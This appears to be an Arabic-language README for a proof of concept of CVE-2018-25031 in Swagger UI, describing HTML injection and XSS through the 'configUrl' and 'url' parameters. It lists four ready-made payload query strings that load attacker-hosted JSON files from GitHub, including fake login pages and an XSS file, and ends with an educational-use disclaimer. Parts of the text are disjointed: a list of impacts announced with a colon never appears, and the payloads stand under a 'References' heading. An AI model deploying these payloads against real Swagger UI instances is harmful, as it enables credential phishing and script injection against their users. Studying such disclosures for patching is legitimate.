
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI هي مكتبة مستخدمة على نطاق واسع تقوم بعرض مواصفات OpenAPI (المعروفة سابقًا باسم Swagger) في واجهة ويب تفاعلية. تتيح للمطورين والمتكاملين استكشاف واختبار واجهات برمجة التطبيقات (APIs) دون الحاجة إلى وجود تطبيق خلفي.
ينشأ الثغرة من عدم كفاية التحقق من معاملات عنوان URL المستخدمة لتحميل ملفات التهيئة أو المواصفات عن بُعد بواسطة عميل Swagger UI. المعاملات الشائعة المتضمنة هي:
?url=.yaml?configUrl=.jsonيمكن للمهاجم توجيه هذه المعاملات إلى تعريف OpenAPI أو ملف تهيئة يتم التحكم به عن بُعد، والذي قد يتم عرضه بواسطة مثيل ضعيف.
يمكن أن يؤدي تحميل ملف ضار عن بُعد إلى تمكين العديد من النتائج عالية التأثير حسب تكوين الاستضافة والضمانات الموجودة:
المراجع:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
المحتوى الموجود في هذا المستودع مقدم للأغراض التعليمية والإعلامية فقط. المؤلف غير مسؤول عن أي استخدام خاطئ. تأكد من حصولك على الإذن المناسب قبل الاستخدام، وتصرف بمسؤولية على مسؤوليتك الخاصة، واتبع جميع الإرشادات القانونية والأخلاقية.